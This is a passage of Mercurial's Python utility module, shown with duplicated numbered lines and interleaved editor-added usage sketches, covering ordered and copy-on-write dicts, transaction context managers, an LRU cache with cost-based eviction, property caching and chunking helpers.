1100 self._copied = getattr(self, '_copied', 0) + 1
1101 return self
1101 return self
1102
1102
1103 class sortdict(collections.OrderedDict):
1103 class sortdict(collections.OrderedDict):
1104 '''a simple insertion-order-preserving dictionary
1104 '''a simple insertion-order-preserving dictionary
1105
1105
1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1107 >>> d2 = d1.copy()
1107 >>> d2 = d1.copy()
1108 >>> d2
1108 >>> d2
1109 sortdict([('a', 0), ('b', 1)])
1109 sortdict([('a', 0), ('b', 1)])
1110 >>> d2.update([(b'a', 2)])
1110 >>> d2.update([(b'a', 2)])
1111 >>> list(d2.keys()) # should still be in last-set order
1111 >>> list(d2.keys()) # should still be in last-set order
1112 ['b', 'a']
1112 ['b', 'a']
1113 '''
1113 '''
1114
1114
1115 def __setitem__(self, key, value):
1115 def __setitem__(self, key, value):
1116 if key in self:
1116 if key in self:
1117 del self[key]
1117 del self[key]
1118 super(sortdict, self).__setitem__(key, value)
1118 super(sortdict, self).__setitem__(key, value)
1119
1119
1120 if pycompat.ispypy:
1120 if pycompat.ispypy:
1121 # __setitem__() isn't called as of PyPy 5.8.0
1121 # __setitem__() isn't called as of PyPy 5.8.0
1122 def update(self, src):
1122 def update(self, src):
1123 if isinstance(src, dict):
1123 if isinstance(src, dict):
1124 src = src.iteritems()
1124 src = src.iteritems()
1125 for k, v in src:
1125 for k, v in src:
1126 self[k] = v
1126 self[k] = v
1127
1127
1128 class cowdict(cow, dict):
1128 class cowdict(cow, dict):
1129 """copy-on-write dict
1129 """copy-on-write dict
1130
1130
1131 Be sure to call d = d.preparewrite() before writing to d.
1131 Be sure to call d = d.preparewrite() before writing to d.
1132
1132
1133 >>> a = cowdict()
1133 >>> a = cowdict()
1134 >>> a is a.preparewrite()
1134 >>> a is a.preparewrite()
1135 True
1135 True
1136 >>> b = a.copy()
1136 >>> b = a.copy()
1137 >>> b is a
1137 >>> b is a
1138 True
1138 True
1139 >>> c = b.copy()
1139 >>> c = b.copy()
1140 >>> c is a
1140 >>> c is a
1141 True
1141 True
1142 >>> a = a.preparewrite()
1142 >>> a = a.preparewrite()
1143 >>> b is a
1143 >>> b is a
1144 False
1144 False
1145 >>> a is a.preparewrite()
1145 >>> a is a.preparewrite()
1146 True
1146 True
1147 >>> c = c.preparewrite()
1147 >>> c = c.preparewrite()
1148 >>> b is c
1148 >>> b is c
1149 False
1149 False
1150 >>> b is b.preparewrite()
1150 >>> b is b.preparewrite()
1151 True
1151 True
1152 """
1152 """
1153
1153
1154 class cowsortdict(cow, sortdict):
1154 class cowsortdict(cow, sortdict):
1155 """copy-on-write sortdict
1155 """copy-on-write sortdict
1156
1156
1157 Be sure to call d = d.preparewrite() before writing to d.
1157 Be sure to call d = d.preparewrite() before writing to d.
1158 """
1158 """
1159
1159
1160 class transactional(object):
1160 class transactional(object):
1161 """Base class for making a transactional type into a context manager."""
1161 """Base class for making a transactional type into a context manager."""
1162 __metaclass__ = abc.ABCMeta
1162 __metaclass__ = abc.ABCMeta
1163
1163
1164 @abc.abstractmethod
1164 @abc.abstractmethod
1165 def close(self):
1165 def close(self):
1166 """Successfully closes the transaction."""
1166 """Successfully closes the transaction."""
1167
1167
1168 @abc.abstractmethod
1168 @abc.abstractmethod
1169 def release(self):
1169 def release(self):
1170 """Marks the end of the transaction.
1170 """Marks the end of the transaction.
1171
1171
1172 If the transaction has not been closed, it will be aborted.
1172 If the transaction has not been closed, it will be aborted.
1173 """
1173 """
1174
1174
1175 def __enter__(self):
1175 def __enter__(self):
1176 return self
1176 return self
1177
1177
1178 def __exit__(self, exc_type, exc_val, exc_tb):
1178 def __exit__(self, exc_type, exc_val, exc_tb):
1179 try:
1179 try:
1180 if exc_type is None:
1180 if exc_type is None:
1181 self.close()
1181 self.close()
1182 finally:
1182 finally:
1183 self.release()
1183 self.release()
1184
1184
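# Minimal sketch (editor's addition, not part of util.py): a concrete
# transactional type. Leaving the "with" block cleanly calls close() and
# then release(); leaving it via an exception skips close(), so release()
# can roll the work back.
class _demotransaction(transactional):
    def __init__(self):
        self.closed = self.released = False
    def close(self):
        self.closed = True      # commit point
    def release(self):
        self.released = True    # would abort here if close() never ran
# with _demotransaction() as tr:   # on success: closed, then released
#     do_work(tr)                  # do_work is hypothetical; on error,
#                                  # only release() runs (an abort)
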
1185 @contextlib.contextmanager
1185 @contextlib.contextmanager
1186 def acceptintervention(tr=None):
1186 def acceptintervention(tr=None):
1187 """A context manager that closes the transaction on InterventionRequired
1187 """A context manager that closes the transaction on InterventionRequired
1188
1188
1189 If no transaction was provided, this simply runs the body and returns.
1189 If no transaction was provided, this simply runs the body and returns.
1190 """
1190 """
1191 if not tr:
1191 if not tr:
1192 yield
1192 yield
1193 return
1193 return
1194 try:
1194 try:
1195 yield
1195 yield
1196 tr.close()
1196 tr.close()
1197 except error.InterventionRequired:
1197 except error.InterventionRequired:
1198 tr.close()
1198 tr.close()
1199 raise
1199 raise
1200 finally:
1200 finally:
1201 tr.release()
1201 tr.release()
1202
1202
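# Usage sketch (editor's addition): with acceptintervention, a normal exit
# and an InterventionRequired both close (commit) the transaction - the
# exception is then re-raised - while any other exception leaves the
# transaction unclosed so release() aborts it. "tr" stands for any
# transactional object.
def _acceptinterventionexample(tr):
    with acceptintervention(tr):
        pass  # work happens here; tr.close() and tr.release() follow
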
1203 @contextlib.contextmanager
1203 @contextlib.contextmanager
1204 def nullcontextmanager():
1204 def nullcontextmanager():
1205 yield
1205 yield
1206
1206
1207 class _lrucachenode(object):
1207 class _lrucachenode(object):
1208 """A node in a doubly linked list.
1208 """A node in a doubly linked list.
1209
1209
1210 Holds a reference to nodes on either side as well as a key-value
1210 Holds a reference to nodes on either side as well as a key-value
1211 pair for the dictionary entry.
1211 pair for the dictionary entry.
1212 """
1212 """
1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1214
1214
1215 def __init__(self):
1215 def __init__(self):
1216 self.next = None
1216 self.next = None
1217 self.prev = None
1217 self.prev = None
1218
1218
1219 self.key = _notset
1219 self.key = _notset
1220 self.value = None
1220 self.value = None
1221 self.cost = 0
1221 self.cost = 0
1222
1222
1223 def markempty(self):
1223 def markempty(self):
1224 """Mark the node as emptied."""
1224 """Mark the node as emptied."""
1225 self.key = _notset
1225 self.key = _notset
1226 self.value = None
1226 self.value = None
1227 self.cost = 0
1227 self.cost = 0
1228
1228
1229 class lrucachedict(object):
1229 class lrucachedict(object):
1230 """Dict that caches most recent accesses and sets.
1230 """Dict that caches most recent accesses and sets.
1231
1231
1232 The dict consists of an actual backing dict - indexed by original
1232 The dict consists of an actual backing dict - indexed by original
1233 key - and a doubly linked circular list defining the order of entries in
1233 key - and a doubly linked circular list defining the order of entries in
1234 the cache.
1234 the cache.
1235
1235
1236 The head node is the newest entry in the cache. If the cache is full,
1236 The head node is the newest entry in the cache. If the cache is full,
1237 we recycle head.prev and make it the new head. Cache accesses result in
1237 we recycle head.prev and make it the new head. Cache accesses result in
1238 the node being moved to before the existing head and being marked as the
1238 the node being moved to before the existing head and being marked as the
1239 new head node.
1239 new head node.
1240
1240
1241 Items in the cache can be inserted with an optional "cost" value. This is
1241 Items in the cache can be inserted with an optional "cost" value. This is
1242 simply an integer that is specified by the caller. The cache can be queried
1242 simply an integer that is specified by the caller. The cache can be queried
1243 for the total cost of all items presently in the cache.
1243 for the total cost of all items presently in the cache.
1244
1244
1245 The cache can also define a maximum cost. If a cache insertion would
1245 The cache can also define a maximum cost. If a cache insertion would
1246 cause the total cost of the cache to go beyond the maximum cost limit,
1246 cause the total cost of the cache to go beyond the maximum cost limit,
1247 nodes will be evicted to make room for the new node. This can be used
1247 nodes will be evicted to make room for the new node. This can be used
1248 to e.g. set a max memory limit and associate an estimated bytes size
1248 to e.g. set a max memory limit and associate an estimated bytes size
1249 cost to each item in the cache. By default, no maximum cost is enforced.
1249 cost to each item in the cache. By default, no maximum cost is enforced.
1250 """
1250 """
1251 def __init__(self, max, maxcost=0):
1251 def __init__(self, max, maxcost=0):
1252 self._cache = {}
1252 self._cache = {}
1253
1253
1254 self._head = head = _lrucachenode()
1254 self._head = head = _lrucachenode()
1255 head.prev = head
1255 head.prev = head
1256 head.next = head
1256 head.next = head
1257 self._size = 1
1257 self._size = 1
1258 self.capacity = max
1258 self.capacity = max
1259 self.totalcost = 0
1259 self.totalcost = 0
1260 self.maxcost = maxcost
1260 self.maxcost = maxcost
1261
1261
1262 def __len__(self):
1262 def __len__(self):
1263 return len(self._cache)
1263 return len(self._cache)
1264
1264
1265 def __contains__(self, k):
1265 def __contains__(self, k):
1266 return k in self._cache
1266 return k in self._cache
1267
1267
1268 def __iter__(self):
1268 def __iter__(self):
1269 # We don't have to iterate in cache order, but why not.
1269 # We don't have to iterate in cache order, but why not.
1270 n = self._head
1270 n = self._head
1271 for i in range(len(self._cache)):
1271 for i in range(len(self._cache)):
1272 yield n.key
1272 yield n.key
1273 n = n.next
1273 n = n.next
1274
1274
1275 def __getitem__(self, k):
1275 def __getitem__(self, k):
1276 node = self._cache[k]
1276 node = self._cache[k]
1277 self._movetohead(node)
1277 self._movetohead(node)
1278 return node.value
1278 return node.value
1279
1279
1280 def insert(self, k, v, cost=0):
1280 def insert(self, k, v, cost=0):
1281 """Insert a new item in the cache with optional cost value."""
1281 """Insert a new item in the cache with optional cost value."""
1282 node = self._cache.get(k)
1282 node = self._cache.get(k)
1283 # Replace existing value and mark as newest.
1283 # Replace existing value and mark as newest.
1284 if node is not None:
1284 if node is not None:
1285 self.totalcost -= node.cost
1285 self.totalcost -= node.cost
1286 node.value = v
1286 node.value = v
1287 node.cost = cost
1287 node.cost = cost
1288 self.totalcost += cost
1288 self.totalcost += cost
1289 self._movetohead(node)
1289 self._movetohead(node)
1290
1290
1291 if self.maxcost:
1291 if self.maxcost:
1292 self._enforcecostlimit()
1292 self._enforcecostlimit()
1293
1293
1294 return
1294 return
1295
1295
1296 if self._size < self.capacity:
1296 if self._size < self.capacity:
1297 node = self._addcapacity()
1297 node = self._addcapacity()
1298 else:
1298 else:
1299 # Grab the last/oldest item.
1299 # Grab the last/oldest item.
1300 node = self._head.prev
1300 node = self._head.prev
1301
1301
1302 # At capacity. Kill the old entry.
1302 # At capacity. Kill the old entry.
1303 if node.key is not _notset:
1303 if node.key is not _notset:
1304 self.totalcost -= node.cost
1304 self.totalcost -= node.cost
1305 del self._cache[node.key]
1305 del self._cache[node.key]
1306
1306
1307 node.key = k
1307 node.key = k
1308 node.value = v
1308 node.value = v
1309 node.cost = cost
1309 node.cost = cost
1310 self.totalcost += cost
1310 self.totalcost += cost
1311 self._cache[k] = node
1311 self._cache[k] = node
1312 # And mark it as newest entry. No need to adjust order since it
1312 # And mark it as newest entry. No need to adjust order since it
1313 # is already self._head.prev.
1313 # is already self._head.prev.
1314 self._head = node
1314 self._head = node
1315
1315
1316 if self.maxcost:
1316 if self.maxcost:
1317 self._enforcecostlimit()
1317 self._enforcecostlimit()
1318
1318
1319 def __setitem__(self, k, v):
1319 def __setitem__(self, k, v):
1320 self.insert(k, v)
1320 self.insert(k, v)
1321
1321
1322 def __delitem__(self, k):
1322 def __delitem__(self, k):
1323 node = self._cache.pop(k)
1323 node = self._cache.pop(k)
1324 self.totalcost -= node.cost
1324 self.totalcost -= node.cost
1325 node.markempty()
1325 node.markempty()
1326
1326
1327 # Temporarily mark as newest item before re-adjusting head to make
1327 # Temporarily mark as newest item before re-adjusting head to make
1328 # this node the oldest item.
1328 # this node the oldest item.
1329 self._movetohead(node)
1329 self._movetohead(node)
1330 self._head = node.next
1330 self._head = node.next
1331
1331
1332 # Additional dict methods.
1332 # Additional dict methods.
1333
1333
1334 def get(self, k, default=None):
1334 def get(self, k, default=None):
1335 try:
1335 try:
1336 return self.__getitem__(k)
1336 return self.__getitem__(k)
1337 except KeyError:
1337 except KeyError:
1338 return default
1338 return default
1339
1339
1340 def clear(self):
1340 def clear(self):
1341 n = self._head
1341 n = self._head
1342 while n.key is not _notset:
1342 while n.key is not _notset:
1343 self.totalcost -= n.cost
1343 self.totalcost -= n.cost
1344 n.markempty()
1344 n.markempty()
1345 n = n.next
1345 n = n.next
1346
1346
1347 self._cache.clear()
1347 self._cache.clear()
1348
1348
1349 def copy(self, capacity=None, maxcost=0):
1349 def copy(self, capacity=None, maxcost=0):
1350 """Create a new cache as a copy of the current one.
1350 """Create a new cache as a copy of the current one.
1351
1351
1352 By default, the new cache has the same capacity as the existing one.
1352 By default, the new cache has the same capacity as the existing one.
1353 But, the cache capacity can be changed as part of performing the
1353 But, the cache capacity can be changed as part of performing the
1354 copy.
1354 copy.
1355
1355
1356 Items in the copy have an insertion/access order matching this
1356 Items in the copy have an insertion/access order matching this
1357 instance.
1357 instance.
1358 """
1358 """
1359
1359
1360 capacity = capacity or self.capacity
1360 capacity = capacity or self.capacity
1361 maxcost = maxcost or self.maxcost
1361 maxcost = maxcost or self.maxcost
1362 result = lrucachedict(capacity, maxcost=maxcost)
1362 result = lrucachedict(capacity, maxcost=maxcost)
1363
1363
1364 # We copy entries by iterating in oldest-to-newest order so the copy
1364 # We copy entries by iterating in oldest-to-newest order so the copy
1365 # has the correct ordering.
1365 # has the correct ordering.
1366
1366
1367 # Find the first non-empty entry.
1367 # Find the first non-empty entry.
1368 n = self._head.prev
1368 n = self._head.prev
1369 while n.key is _notset and n is not self._head:
1369 while n.key is _notset and n is not self._head:
1370 n = n.prev
1370 n = n.prev
1371
1371
1372 # We could potentially skip the first N items when decreasing capacity.
1372 # We could potentially skip the first N items when decreasing capacity.
1373 # But let's keep it simple unless it is a performance problem.
1373 # But let's keep it simple unless it is a performance problem.
1374 for i in range(len(self._cache)):
1374 for i in range(len(self._cache)):
1375 result.insert(n.key, n.value, cost=n.cost)
1375 result.insert(n.key, n.value, cost=n.cost)
1376 n = n.prev
1376 n = n.prev
1377
1377
1378 return result
1378 return result
1379
1379
1380 def popoldest(self):
1380 def popoldest(self):
1381 """Remove the oldest item from the cache.
1381 """Remove the oldest item from the cache.
1382
1382
1383 Returns the (key, value) describing the removed cache entry.
1383 Returns the (key, value) describing the removed cache entry.
1384 """
1384 """
1385 if not self._cache:
1385 if not self._cache:
1386 return
1386 return
1387
1387
1388 # Walk the linked list backwards starting at tail node until we hit
1388 # Walk the linked list backwards starting at tail node until we hit
1389 # a non-empty node.
1389 # a non-empty node.
1390 n = self._head.prev
1390 n = self._head.prev
1391 while n.key is _notset:
1391 while n.key is _notset:
1392 n = n.prev
1392 n = n.prev
1393
1393
1394 key, value = n.key, n.value
1394 key, value = n.key, n.value
1395
1395
1396 # And remove it from the cache and mark it as empty.
1396 # And remove it from the cache and mark it as empty.
1397 del self._cache[n.key]
1397 del self._cache[n.key]
1398 self.totalcost -= n.cost
1398 self.totalcost -= n.cost
1399 n.markempty()
1399 n.markempty()
1400
1400
1401 return key, value
1401 return key, value
1402
1402
1403 def _movetohead(self, node):
1403 def _movetohead(self, node):
1404 """Mark a node as the newest, making it the new head.
1404 """Mark a node as the newest, making it the new head.
1405
1405
1406 When a node is accessed, it becomes the freshest entry in the LRU
1406 When a node is accessed, it becomes the freshest entry in the LRU
1407 list, which is denoted by self._head.
1407 list, which is denoted by self._head.
1408
1408
1409 Visually, let's make ``N`` the new head node (* denotes head):
1409 Visually, let's make ``N`` the new head node (* denotes head):
1410
1410
1411 previous/oldest <-> head <-> next/next newest
1411 previous/oldest <-> head <-> next/next newest
1412
1412
1413 ----<->--- A* ---<->-----
1413 ----<->--- A* ---<->-----
1414 | |
1414 | |
1415 E <-> D <-> N <-> C <-> B
1415 E <-> D <-> N <-> C <-> B
1416
1416
1417 To:
1417 To:
1418
1418
1419 ----<->--- N* ---<->-----
1419 ----<->--- N* ---<->-----
1420 | |
1420 | |
1421 E <-> D <-> C <-> B <-> A
1421 E <-> D <-> C <-> B <-> A
1422
1422
1423 This requires the following moves:
1423 This requires the following moves:
1424
1424
1425 C.next = D (node.prev.next = node.next)
1425 C.next = D (node.prev.next = node.next)
1426 D.prev = C (node.next.prev = node.prev)
1426 D.prev = C (node.next.prev = node.prev)
1427 E.next = N (head.prev.next = node)
1427 E.next = N (head.prev.next = node)
1428 N.prev = E (node.prev = head.prev)
1428 N.prev = E (node.prev = head.prev)
1429 N.next = A (node.next = head)
1429 N.next = A (node.next = head)
1430 A.prev = N (head.prev = node)
1430 A.prev = N (head.prev = node)
1431 """
1431 """
1432 head = self._head
1432 head = self._head
1433 # C.next = D
1433 # C.next = D
1434 node.prev.next = node.next
1434 node.prev.next = node.next
1435 # D.prev = C
1435 # D.prev = C
1436 node.next.prev = node.prev
1436 node.next.prev = node.prev
1437 # N.prev = E
1437 # N.prev = E
1438 node.prev = head.prev
1438 node.prev = head.prev
1439 # N.next = A
1439 # N.next = A
1440 # It is tempting to do just "head" here, however if node is
1440 # It is tempting to do just "head" here, however if node is
1441 # adjacent to head, this will do bad things.
1441 # adjacent to head, this will do bad things.
1442 node.next = head.prev.next
1442 node.next = head.prev.next
1443 # E.next = N
1443 # E.next = N
1444 node.next.prev = node
1444 node.next.prev = node
1445 # A.prev = N
1445 # A.prev = N
1446 node.prev.next = node
1446 node.prev.next = node
1447
1447
1448 self._head = node
1448 self._head = node
1449
1449
1450 def _addcapacity(self):
1450 def _addcapacity(self):
1451 """Add a node to the circular linked list.
1451 """Add a node to the circular linked list.
1452
1452
1453 The new node is inserted before the head node.
1453 The new node is inserted before the head node.
1454 """
1454 """
1455 head = self._head
1455 head = self._head
1456 node = _lrucachenode()
1456 node = _lrucachenode()
1457 head.prev.next = node
1457 head.prev.next = node
1458 node.prev = head.prev
1458 node.prev = head.prev
1459 node.next = head
1459 node.next = head
1460 head.prev = node
1460 head.prev = node
1461 self._size += 1
1461 self._size += 1
1462 return node
1462 return node
1463
1463
1464 def _enforcecostlimit(self):
1464 def _enforcecostlimit(self):
1465 # This should run after an insertion. It should only be called if total
1465 # This should run after an insertion. It should only be called if total
1466 # cost limits are being enforced.
1466 # cost limits are being enforced.
1467 # The most recently inserted node is never evicted.
1467 # The most recently inserted node is never evicted.
1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1468 if len(self) <= 1 or self.totalcost <= self.maxcost:
1469 return
1469 return
1470
1470
1471 # This is logically equivalent to calling popoldest() until we
1471 # This is logically equivalent to calling popoldest() until we
1472 # free up enough cost. We don't do that since popoldest() needs
1472 # free up enough cost. We don't do that since popoldest() needs
1473 # to walk the linked list and doing this in a loop would be
1473 # to walk the linked list and doing this in a loop would be
1474 # quadratic. So we find the first non-empty node and then
1474 # quadratic. So we find the first non-empty node and then
1475 # walk nodes until we free up enough capacity.
1475 # walk nodes until we free up enough capacity.
1476 #
1476 #
1477 # If we only removed the minimum number of nodes to free enough
1477 # If we only removed the minimum number of nodes to free enough
1478 # cost at insert time, chances are high that the next insert would
1478 # cost at insert time, chances are high that the next insert would
1479 # also require pruning. This would effectively constitute quadratic
1479 # also require pruning. This would effectively constitute quadratic
1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1480 # behavior for insert-heavy workloads. To mitigate this, we set a
1481 # target cost that is a percentage of the max cost. This will tend
1481 # target cost that is a percentage of the max cost. This will tend
1482 # to free more nodes when the high water mark is reached, which
1482 # to free more nodes when the high water mark is reached, which
1483 # lowers the chances of needing to prune on the subsequent insert.
1483 # lowers the chances of needing to prune on the subsequent insert.
1484 targetcost = int(self.maxcost * 0.75)
1484 targetcost = int(self.maxcost * 0.75)
1485
1485
1486 n = self._head.prev
1486 n = self._head.prev
1487 while n.key is _notset:
1487 while n.key is _notset:
1488 n = n.prev
1488 n = n.prev
1489
1489
1490 while len(self) > 1 and self.totalcost > targetcost:
1490 while len(self) > 1 and self.totalcost > targetcost:
1491 del self._cache[n.key]
1491 del self._cache[n.key]
1492 self.totalcost -= n.cost
1492 self.totalcost -= n.cost
1493 n.markempty()
1493 n.markempty()
1494 n = n.prev
1494 n = n.prev
1495
1495
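# Usage sketch (editor's addition): an lrucachedict with a cost ceiling.
# Each insert may carry a cost (e.g. an estimated byte size); once
# totalcost exceeds maxcost, the oldest entries are evicted down to about
# 75% of the limit, and the most recent insert always survives.
def _lrucachedictexample():
    d = lrucachedict(4, maxcost=100)
    d.insert('a', 'value-a', cost=60)
    d.insert('b', 'value-b', cost=60)  # pushes totalcost past maxcost
    return 'b' in d and 'a' not in d   # True: 'a' was evicted
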
1496 def lrucachefunc(func):
1496 def lrucachefunc(func):
1497 '''cache most recent results of function calls'''
1497 '''cache most recent results of function calls'''
1498 cache = {}
1498 cache = {}
1499 order = collections.deque()
1499 order = collections.deque()
1500 if func.__code__.co_argcount == 1:
1500 if func.__code__.co_argcount == 1:
1501 def f(arg):
1501 def f(arg):
1502 if arg not in cache:
1502 if arg not in cache:
1503 if len(cache) > 20:
1503 if len(cache) > 20:
1504 del cache[order.popleft()]
1504 del cache[order.popleft()]
1505 cache[arg] = func(arg)
1505 cache[arg] = func(arg)
1506 else:
1506 else:
1507 order.remove(arg)
1507 order.remove(arg)
1508 order.append(arg)
1508 order.append(arg)
1509 return cache[arg]
1509 return cache[arg]
1510 else:
1510 else:
1511 def f(*args):
1511 def f(*args):
1512 if args not in cache:
1512 if args not in cache:
1513 if len(cache) > 20:
1513 if len(cache) > 20:
1514 del cache[order.popleft()]
1514 del cache[order.popleft()]
1515 cache[args] = func(*args)
1515 cache[args] = func(*args)
1516 else:
1516 else:
1517 order.remove(args)
1517 order.remove(args)
1518 order.append(args)
1518 order.append(args)
1519 return cache[args]
1519 return cache[args]
1520
1520
1521 return f
1521 return f
1522
1522
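# Usage sketch (editor's addition): like cachefunc, but bounded - once the
# cache holds more than 20 distinct argument values, the least recently
# used entry is discarded before the new result is stored.
def _lrucachefuncexample():
    counted = lrucachefunc(lambda x: x + 1)
    for i in range(30):
        counted(i)        # later values evict the oldest cached entries
    return counted(29)    # 30, served from the still-warm cache
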
1523 class propertycache(object):
1523 class propertycache(object):
1524 def __init__(self, func):
1524 def __init__(self, func):
1525 self.func = func
1525 self.func = func
1526 self.name = func.__name__
1526 self.name = func.__name__
1527 def __get__(self, obj, type=None):
1527 def __get__(self, obj, type=None):
1528 result = self.func(obj)
1528 result = self.func(obj)
1529 self.cachevalue(obj, result)
1529 self.cachevalue(obj, result)
1530 return result
1530 return result
1531
1531
1532 def cachevalue(self, obj, value):
1532 def cachevalue(self, obj, value):
1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1533 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1534 obj.__dict__[self.name] = value
1534 obj.__dict__[self.name] = value
1535
1535
1536 def clearcachedproperty(obj, prop):
1536 def clearcachedproperty(obj, prop):
1537 '''clear a cached property value, if one has been set'''
1537 '''clear a cached property value, if one has been set'''
1538 if prop in obj.__dict__:
1538 if prop in obj.__dict__:
1539 del obj.__dict__[prop]
1539 del obj.__dict__[prop]
1540
1540
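# Usage sketch (editor's addition): a lazily computed attribute. The first
# access runs the function and stores the result via cachevalue() in the
# instance __dict__, shadowing the descriptor; clearcachedproperty()
# removes that entry so the next access recomputes.
class _propertycacheexample(object):
    @propertycache
    def expensive(self):
        return sum(range(1000))  # runs only on the first attribute access
# obj = _propertycacheexample()
# obj.expensive                          # computed, then cached on obj
# clearcachedproperty(obj, 'expensive')  # next access recomputes
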
1541 def increasingchunks(source, min=1024, max=65536):
1541 def increasingchunks(source, min=1024, max=65536):
1542 '''return no less than min bytes per chunk while data remains,
1542 '''return no less than min bytes per chunk while data remains,
1543 doubling min after each chunk until it reaches max'''
1543 doubling min after each chunk until it reaches max'''
1544 def log2(x):
1544 def log2(x):
1545 if not x:
1545 if not x:
1546 return 0
1546 return 0
1547 i = 0
1547 i = 0
1548 while x:
1548 while x:
1549 x >>= 1
1549 x >>= 1
1550 i += 1
1550 i += 1
1551 return i - 1
1551 return i - 1
1552
1552
1553 buf = []
1553 buf = []
1554 blen = 0
1554 blen = 0
1555 for chunk in source:
1555 for chunk in source:
1556 buf.append(chunk)
1556 buf.append(chunk)
1557 blen += len(chunk)
1557 blen += len(chunk)
1558 if blen >= min:
1558 if blen >= min:
1559 if min < max:
1559 if min < max:
1560 min = min << 1
1560 min = min << 1
1561 nmin = 1 << log2(blen)
1561 nmin = 1 << log2(blen)
1562 if nmin > min:
1562 if nmin > min:
1563 min = nmin
1563 min = nmin
1564 if min > max:
1564 if min > max:
1565 min = max
1565 min = max
1566 yield ''.join(buf)
1566 yield ''.join(buf)
1567 blen = 0
1567 blen = 0
1568 buf = []
1568 buf = []
1569 if buf:
1569 if buf:
1570 yield ''.join(buf)
1570 yield ''.join(buf)
1571
1571
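# Usage sketch (editor's addition): increasingchunks rebatches a stream of
# small chunks into progressively larger ones (min doubles per emitted
# chunk, capped at max), cutting per-chunk overhead for large streams.
def _increasingchunksexample():
    source = ('x' * 512 for _ in range(64))       # 32 KiB in small pieces
    sizes = [len(c) for c in increasingchunks(source)]
    return sizes  # first chunk >= 1024 bytes, later chunks grow toward max
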
1572 def always(fn):
1572 def always(fn):
1573 return True
1573 return True
1574
1574
1575 def never(fn):
1575 def never(fn):
1576 return False
1576 return False
1577
1577
1578 def nogc(func):
1578 def nogc(func):
1579 """disable garbage collector
1579 """disable garbage collector
1580
1580
1581 Python's garbage collector triggers a GC each time a certain number of
1581 Python's garbage collector triggers a GC each time a certain number of
1582 container objects (the number being defined by gc.get_threshold()) are
1582 container objects (the number being defined by gc.get_threshold()) are
1583 allocated even when marked not to be tracked by the collector. Tracking has
1583 allocated even when marked not to be tracked by the collector. Tracking has
1584 no effect on when GCs are triggered, only on what objects the GC looks
1584 no effect on when GCs are triggered, only on what objects the GC looks
1585 into. As a workaround, disable GC while building complex (huge)
1585 into. As a workaround, disable GC while building complex (huge)
1586 containers.
1586 containers.
1587
1587
1588 This garbage collector issue has been fixed in 2.7. But it still affects
1588 This garbage collector issue has been fixed in 2.7. But it still affects
1589 CPython's performance.
1589 CPython's performance.
1590 """
1590 """
1591 def wrapper(*args, **kwargs):
1591 def wrapper(*args, **kwargs):
1592 gcenabled = gc.isenabled()
1592 gcenabled = gc.isenabled()
1593 gc.disable()
1593 gc.disable()
1594 try:
1594 try:
1595 return func(*args, **kwargs)
1595 return func(*args, **kwargs)
1596 finally:
1596 finally:
1597 if gcenabled:
1597 if gcenabled:
1598 gc.enable()
1598 gc.enable()
1599 return wrapper
1599 return wrapper
1600
1600
1601 if pycompat.ispypy:
1601 if pycompat.ispypy:
1602 # PyPy runs slower with gc disabled
1602 # PyPy runs slower with gc disabled
1603 nogc = lambda x: x
1603 nogc = lambda x: x
1604
1604
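# Usage sketch (editor's addition): wrap a builder of huge container
# structures with @nogc so CPython's collector does not repeatedly scan
# the partially built object graph; the previous GC state is restored
# when the call returns (and on PyPy, nogc is a no-op).
@nogc
def _nogcexample(n):
    # build a large dict without GC pauses; GC is re-enabled afterwards
    return dict((i, (i, i + 1)) for i in range(n))
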
1605 def pathto(root, n1, n2):
1605 def pathto(root, n1, n2):
1606 '''return the relative path from one place to another.
1606 '''return the relative path from one place to another.
1607 root should use os.sep to separate directories
1607 root should use os.sep to separate directories
1608 n1 should use os.sep to separate directories
1608 n1 should use os.sep to separate directories
1609 n2 should use "/" to separate directories
1609 n2 should use "/" to separate directories
1610 returns an os.sep-separated path.
1610 returns an os.sep-separated path.
1611
1611
1612 If n1 is a relative path, it's assumed it's
1612 If n1 is a relative path, it's assumed it's
1613 relative to root.
1613 relative to root.
1614 n2 should always be relative to root.
1614 n2 should always be relative to root.
1615 '''
1615 '''
1616 if not n1:
1616 if not n1:
1617 return localpath(n2)
1617 return localpath(n2)
1618 if os.path.isabs(n1):
1618 if os.path.isabs(n1):
1619 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1619 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1620 return os.path.join(root, localpath(n2))
1620 return os.path.join(root, localpath(n2))
1621 n2 = '/'.join((pconvert(root), n2))
1621 n2 = '/'.join((pconvert(root), n2))
1622 a, b = splitpath(n1), n2.split('/')
1622 a, b = splitpath(n1), n2.split('/')
1623 a.reverse()
1623 a.reverse()
1624 b.reverse()
1624 b.reverse()
1625 while a and b and a[-1] == b[-1]:
1625 while a and b and a[-1] == b[-1]:
1626 a.pop()
1626 a.pop()
1627 b.pop()
1627 b.pop()
1628 b.reverse()
1628 b.reverse()
1629 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1629 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1630
1630
1631 # the location of data files matching the source code
1631 # the location of data files matching the source code
1632 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1632 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1633 # executable version (py2exe) doesn't support __file__
1633 # executable version (py2exe) doesn't support __file__
1634 datapath = os.path.dirname(pycompat.sysexecutable)
1634 datapath = os.path.dirname(pycompat.sysexecutable)
1635 else:
1635 else:
1636 datapath = os.path.dirname(pycompat.fsencode(__file__))
1636 datapath = os.path.dirname(pycompat.fsencode(__file__))
1637
1637
1638 i18n.setdatapath(datapath)
1638 i18n.setdatapath(datapath)
1639
1639
1640 def checksignature(func):
1640 def checksignature(func):
1641 '''wrap a function with code to check for calling errors'''
1641 '''wrap a function with code to check for calling errors'''
1642 def check(*args, **kwargs):
1642 def check(*args, **kwargs):
1643 try:
1643 try:
1644 return func(*args, **kwargs)
1644 return func(*args, **kwargs)
1645 except TypeError:
1645 except TypeError:
1646 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1646 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1647 raise error.SignatureError
1647 raise error.SignatureError
